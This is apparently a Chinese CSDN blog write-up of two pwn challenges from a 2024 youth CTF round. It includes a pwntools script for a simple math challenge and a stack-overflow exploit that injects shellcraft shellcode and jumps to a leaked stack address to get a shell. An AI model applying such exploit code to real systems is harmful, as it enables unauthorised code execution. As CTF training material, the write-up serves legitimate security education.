青少年ctf pwn 2024round1

已于 2024-03-02 14:15:49 修改
阅读量352 收藏 4
点赞数 9
文章标签: 网络安全
于 2024-03-02 14:14:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z22168/article/details/136414956
版权

青少年ctf2024round1

简单数学题

这个应该不用多说吧,连接端口,然后算三道题就好了,不行就用用计算器吧

from pwn import*
io=remote()
io.recv()
io.sendline('8')
io.recv()
io.sendline('9')
io.recv()
io.sendline('19')
io.interactive()
ezshellcode

也是很简单的一道题
请添加图片描述

首先看保护,有可读可写可执行的位置,所以如题,就用shellcode就好了

唯一麻烦的是,把函数名隐藏了,不过只要运行一下,或者稍微找找,应该都能找得到主函数部分。请添加图片描述

主函数也很简单,先初始化,然后把v2的地址给我们,因为开了pie,所以每次栈地址都不一样,然后就是向v2里输入字符,所以简单的思路就有了,把v2的地址保存下来,然后向v2里输入我们的shellcode,最后返回到v2(返回到v2的原因是,vmmap可以看到,整个栈都是可读可写可执行,所以返回到栈上就好了,懒得去截图了)但是要注意,这道题我的ida给的返回地址是不对的,所以一开始没打下来,还是要自己调试一下

请添加图片描述

gdb可以发现,其实距离rbp根本不是0x110,而是0x100

所以就可以开始写脚本了

from pwn import *
io=remote("challenge.qsnctf.com",32224)
context.os='Linux'
context.arch='amd64'
v2=int(io.recv(14),16)#这一步就是接收v2的值,然后变成16位的整数,变成16位的原因是方便后面payload里面,可以用p64()发送出去
shellcode =asm(shellcraft.sh())
payload=shellcode.ljust(264,b'a')+p64(v2)#这一步就是发送shellcode到v2,然后用ljust填充,再返回到v2
io.sendline(payload)
io.interactive()

别问我为什么ezpwn没写,真不会写

_gets
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2024青少年ctf擂台挑战赛round1-Easy_SQLi
weixin_71656576的博客
03-01 667
接下来可以开始注入了,这个跟最简单的sql注入不一样,没有数据回显,我就用我比较熟悉的布尔盲注开始爆破了。我爆破出来了有三个列,id,username,password。不要在意端口,补wp的时候容器到时了,重新开了一个。写了个py的脚本爆破password的数据。发现没有回显数据,只有这种报错相关的提示。可以直接开始爆破列,手工爆破就用二分法。猜测flag是在password里。登录界面,随便输个1,1。不管三七二十一,开始爆破。
青少年CTF2024wp(部分)
C00K1E
02-13 1910
下载附件拿到:熊曰:呋食食物嘍嗷洞出嗚有眠哮山囑眠拙住訴嗚囑肉拙既寶果動我笨會你出眠嚄寶冬食喜哞吖山噗食類囑出果你盜唬動取噔唬噤樣魚呦爾。 是我的Hanser!凯撒大帝的征讨之路Whale神奇的压缩包表情包上号在最下方访问8000端口的网页的时候,请求了shanghao.zip文件 ,把文件导出,点击save。 stegslove打开,在文件末尾发现qsnctf,再使用steghide(隐写术软件)工具,进行解密
2024青少年ctf擂台挑战赛round1-EasyMD5
weixin_71656576的博客
03-01 478
上传之后网页提示:Not a PDF!文件上传有关,随便上传两个文件,里面的内容的MD5值是php 弱等于的判断。为什么答案出来一瞬间网页就报错了,只能先手动快速截图,再提取了。修改文件后缀为pdf。再次上传,答案出来了。
CTF青少年CTF擂台挑战赛 2024 #Round 1 部分WriteUp_青少年ctf训练平台 追光者
2401_84300239的博客
05-13 953
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CTF特训(二):2024青少年CTF-MISC部分WP
LCW991207的博客
02-02 1522
跟着提示来,江苏省无锡市滨湖区的身份证前6位是320211,因此32021119980405?在最下方访问8000端口的网页的时候,请求了shanghao.zip文件 ,把文件导出,点击save。stegslove打开,在文件末尾发现qsnctf,再使用steghide(隐写术软件)工具,进行解密。下载附件,发现是一个流量包,Wireshark打开文件-导出对象-http对象。附件是一个压缩包和一个文本,压缩包需要密码,那么就从文本里下手解密。这是一个神奇的压缩包,任何密码都是错误的!
青少年CTF擂台挑战赛2024round#1 web与杂项部分题解
2301_76968724的博客
03-02 1828
这次的青少年CTF擂台挑战赛,相较于去年,我觉得,今年的web题很适合刚入门的初学者进行攻克,难度属于中等对于初学者来讲,还是需要了解一些web方面稍微深层的知识,并且做题还是需要一些脑洞。话不多说咱们开始。
ctf pwn基础-1
m0_64815693的博客
02-22 2362
pwn基础 嗯,真的努力在讲了
【Web】青少年CTF擂台挑战赛 2024 #Round 1 wp
uuzeray的博客
03-01 2497
好家伙,比赛结束了还有一道0解web题是吧(随缘写点wp(简单过头,看个乐就好)
青少年CTF擂台挑战赛 2024 #Round 1 个人WriteUp
CHTXRT的博客
03-13 1251
战队名称:Besti学研组 战队排名:11 以下为我个人完成的题目的 Writeup。
青少年CTF 文章管理系统
kuangbaofeiyang的博客
08-24 1138
这里很显然有问题我们尝试用sqlmap跑一遍。这里users表没找到我们要找的数据。点击下一页,url弹出id=1。我换了一个word表找到了。
青少年ctf擂台挑战赛 2024 #round 1
04-16
青少年ctf擂台挑战赛 2024 #round 1
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
CTF PWN专用虚拟机-附件资源
03-05
CTF PWN专用虚拟机-附件资源
CTF PWN 武器库题
12-12
网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,其中PWNPwn All The Things)类别涉及的是程序漏洞利用技术。"CTF PWN 武器库题"通常指的是这类竞赛中的一个问题,挑战者需要利用编程技巧来解决...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8337
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Delphi学习案例.docx
最新发布
07-16
Delphi 是一个基于 Object Pascal 的高级编程语言和集成开发环境 (IDE),适用于 Windows、macOS、iOS 和 Android 平台的快速应用程序开发 (RAD)。以下是一个简单的 Delphi 学习案例,展示如何使用 Delphi 开发一个基本的 Windows 应用程序,该应用程序将实现一个简单的记事本功能。
基于大数据的金融知识图谱建设
07-16
目录 01 Hadoop和图数据库融合的架构 02 金融知识图谱模型及实践 03 金融知识图谱的性能挑战 金融行业内部数据和业务系统的现状 传统的手段无法满足智能风控,智能营销等场景下新的需求 金融行业传统防控体系的约束和新的手段 为什么需要构建知识图谱? 如何落地企业知识图谱 为什么使用图数据库 图数据库选型 基于Hadoop和图数据库的通用融合架构构建知识图谱 基于知识图谱的数据治理与整合 通用文本挖掘与非结构化关系构建 构建隐性关系中的核心技术 某大型证券交易所基于关系挖掘的异常行为发现 某股份制商业银行内审内控项目 某大型清算机构反洗钱项目 流式数据和图数据库的结合 图数据库原生Titan的可优化之处
毕业论文《光电传感器技术的新发展及应用》.doc
07-16
传感器

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值